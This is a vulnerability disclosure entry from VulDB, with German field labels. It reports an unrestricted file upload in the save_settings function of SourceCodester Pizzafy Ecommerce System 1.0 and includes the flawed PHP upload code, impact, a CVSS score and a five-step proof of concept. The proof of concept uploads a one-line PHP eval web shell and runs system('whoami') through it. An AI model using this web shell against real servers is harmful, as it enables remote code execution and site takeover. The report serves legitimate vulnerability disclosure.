| Titel | SourceCodester Pizzafy Ecommerce System using PHP and MySQL 1.0 Unrestricted Upload |
|---|
| Beschreibung | SourceCodester Pizzafy Ecommerce System using PHP and MySQL 1.0 is affected by an unrestricted file upload vulnerability in the save_settings function of the file /admin/admin_class_novo.php (endpoint /admin/ajax.php?action=save_settings, the Site Settings / Setting Handler component).
The handler reads the uploaded "Image" file from $_FILES['img'], builds the destination path from the attacker-controlled original filename ($_FILES['img']['name']) and moves it into the web-accessible directory ../assets/img/ via move_uploaded_file(). Although the file extension is computed with pathinfo(), it is never validated against an allow-list, and there is no MIME/content-type check and no filename randomization. As a result, files of any type (including .php) are stored under a predictable, directly reachable URL.
Affected code (admin_class_novo.php, save_settings):
if(!isset($_SESSION['login_id'])) { return 2; }
if(isset($_FILES['img']) && $_FILES['img']['tmp_name'] != '') {
$target_dir = "../assets/img/";
$file_name = $_FILES['img']['name'];
$target_file = $target_dir . $file_name;
$imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
if(move_uploaded_file($_FILES['img']['tmp_name'], $target_file)) { ... }
}
Impact: an authenticated administrator can upload a PHP file and execute arbitrary OS commands (remote code execution) in the context of the web server.
Proof of Concept:
1. Log in to the admin panel.
2. Open /admin/index.php?page=site_settings.
3. In the Image field (name="img") upload poc.php containing: <?php eval($_GET[1]); ?>
4. Submit; the form posts to /admin/ajax.php?action=save_settings and the file is stored at /assets/img/poc.php.
5. Request /assets/img/poc.php?1=system('whoami'); to execute commands.
This vulnerability requires an authenticated administrator session. CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H (7.2). Note: this is a different sink than CVE-2026-7393, which affects the save_menu function; this report concerns the save_settings function.
|
|---|
| Quelle | ⚠️ https://github.com/leidyardila981-creator/Pizzafy-Ecommerce-1.0-save_settings-File-Upload-RCE |
|---|
| Benutzer | q1w2e3r4t5y6 (UID 98995) |
|---|
| Einreichung | 14.06.2026 16:45 (vor 1 Monat) |
|---|
| Moderieren | 18.07.2026 14:31 (1 month later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 380048 [SourceCodester Pizzafy Ecommerce System 1.0 admin_class_novo.php save_settings img erweiterte Rechte] |
|---|
| Punkte | 20 |
|---|